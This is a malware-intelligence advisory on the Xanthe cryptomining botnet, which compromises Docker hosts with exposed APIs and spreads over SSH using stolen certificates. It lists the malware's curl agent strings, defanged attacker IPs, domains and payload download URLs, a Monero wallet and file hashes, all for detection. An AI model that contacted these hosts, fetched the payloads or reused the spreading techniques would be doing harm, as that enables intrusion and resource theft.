Advisory |
Malware Intelligence |
Target |
Docker/Linux |
Type |
Xanthe Cryptominer |
Xanthe is a cryptomining botnet capable of compromising Docker servers whose API is exposed to the Internet. Xanthe targets Linux systems and is multi-modular. Their functionalities are defined in separate modules, in which the actual payload is a variant of XMRig crypto miner.
The malware can infect multiple hosts by stealing client-side certificates to initiate spreading via Secure Shell (SSH) without the need for credentials. It kills security services and other botnet competitors.
Modules are in bash scripts which can be executed by the Linux shell. The main module is Xanthe.sh that loads four other modules to do the bidding of the attacker:
Listed below are the agent strings used in curl by the malware:
Agent String |
Functionality |
xanthe-start/<version> | Download of killer modules |
xanthecheck-$PROC.$MEM | Initialization Process |
filegetgo/1.5 | Download of miner modules |
xanthe-running/1.2 | Post infection logging |
hostcheck/1.5 | SSH spreading command line |
qi/1.1 | Docker spreading command line |
fczyo-cron/1.5 | Cron scheduled job command line |
goteeeem/1.4 | Post Docker infection download main module |
shell-success/1.4 | Post Docker download logging |
xesacheck-running/1.4 | Post infection check logging |
wemusthavegotkilled/1.4 | Report miner not running |
34[.]92[.]166[.]158
165[.]22[.]48[.]169
138[.]68[.]14[.]52
139[.]162[.]124[.]27
64[.]225[.]46[.]44
xanthe[.]anondns[.]net
monero[.]gktimer[.]com
pool[.]supportxmr[.]com
47E4c2oGb92V2pzMZAivmNT2MJXVBj4TCJHad4QFs2KRjFhQ44Q81DPAjPCVc1KwoKQEp1YHdRMjGLUe6YdHPx5WEvAha1u+35000
hxxp://165[.]22[.]48[.]169:8080/adnckil2
hxxp://138[.]68[.]14[.]52:8080/files/adnckil
hxxp://138[.]68[.]14[.]52:8080/files/iqmjlf.jpg
hxxp://iplogger[.]org/10xNq3
hxxps://iplogger[.]org/1Rfhy7
hxxps://iplogger[.]org/1iGce7
hxxps://iplogger[.]org/1mmup7
hxxp://34[.]92[.]166[.]158:8080/files/pop.sh
hxxp://34[.]92[.]166[.]158:8080/files/xesa.txt
hxxp://34[.]92[.]166[.]158:8080/files/fczyo
hxxp://34[.]92[.]166[.]158:8080/files/java_c
hxxp://34[.]92[.]166[.]158:8080/files/config.json
hxxp://34[.]92[.]166[.]158:8080/files/libprocesshider.so
43fba1c1d95a300a96a20890a1c768a5218b04516893744cff82097a52a51f7c
6cb730a34e0b3de1e927b1c137e1d1819a1550091c0d35de30f68dfacd554783
b16079a80bdd85cbb72a0fa5c956d43922a7518697eeb8a1638164418820390c
8f7c7f3248ba510ca06cbe62728f06703acedc8e54b3609a069c1090ab957224
6a5a0bcb60944597d61d5311a4590f1850c2ba7fc44bbcde4a81b2dd1effe57c
10e1d73e8a894e5bf07e6779ac8085da09aa445e61072349310158b0276bb28d – config.json
071633c8ea4bac5d6acfe1cdc22b3a3f258d99ee8073dd2611eee9876ae40d64 – xanthe.sh
d4637a2efda1f8a96e7f3e31f2c618ce680d3816ba38f075fbefefec77a10f16 – pop.sh
73bfcf268a8481d55db0da34eaf3094f010ed5c0eb5acaf632d2f97ed7bab036 – fczyo
0e6d37099dd89c7eed44063420bd05a2d7b0865a0f690e12457fbec68f9b67a8 – libprocesshider.so
e1a3ff46a99f4fd93d99b0e61fe4ddef8f894c2a69490d71cb34ab10e4afc0d2 – xesa.txt
30a77ab582f0558829a78960929f657a7c3c03c2cf89cd5a0f6934b79a74b7a4 – java_c